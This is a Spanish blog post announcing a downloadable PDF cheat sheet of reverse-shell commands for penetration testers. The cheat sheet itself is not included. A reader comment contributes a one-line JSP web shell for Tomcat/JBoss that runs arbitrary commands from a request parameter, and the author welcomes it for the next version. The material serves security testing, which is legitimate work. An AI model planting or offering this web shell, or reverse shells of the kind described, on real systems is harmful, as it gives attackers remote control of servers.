Hace un tiempo escribà un artÃculo con una recopilación de comandos de Unix/Linux listo para ser utilizados en la etapa de "Explotation", es decir, momento en el que se explota con éxito la vulnerabilidad detectada, por ejemplo, inyectando una lÃnea de comando que habilite una terminal remota (Shell inversa) con el que controlar el Sistema vulnerable.
Para celebrar que he superado los 800 seguidores en Twitter, he realizado una recopilación de algunos de los comandos más utilizados y populares en la creación de "Reverse Shells", o lo que es lo mismo, comandos de Linux para generar una conexión desde la victima con una Shell de Linux activa.
Esta recopilación de comandos la he plasmado en una sola hoja a modo de "chuleta" (Cheet Sheet) para que los #Pentester y/o #Ethical Hacker (o cualquier otro profesional de la Seguridad) la tenga a mano durante un test de penetración y/o Auditoria de Seguridad.
A continuación os dejo el enlace para que podáis descargar este PDF:
SHA1: 585396e485223a5de8d8e403ba48a5b6d6e05127
Cheet Sheet based on: pentestmonkey.net & http://bernardodamele.blogspot.com.es/
Buenas, gracias por el share
ResponderEliminaruno mas a la familia
#jsp - tomcat/jsboss
<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>
Gracias! ;) Ahora habrá que ir preparando un hueco para incluirlo en el cheatsheet.
ResponderEliminarUn Saludo.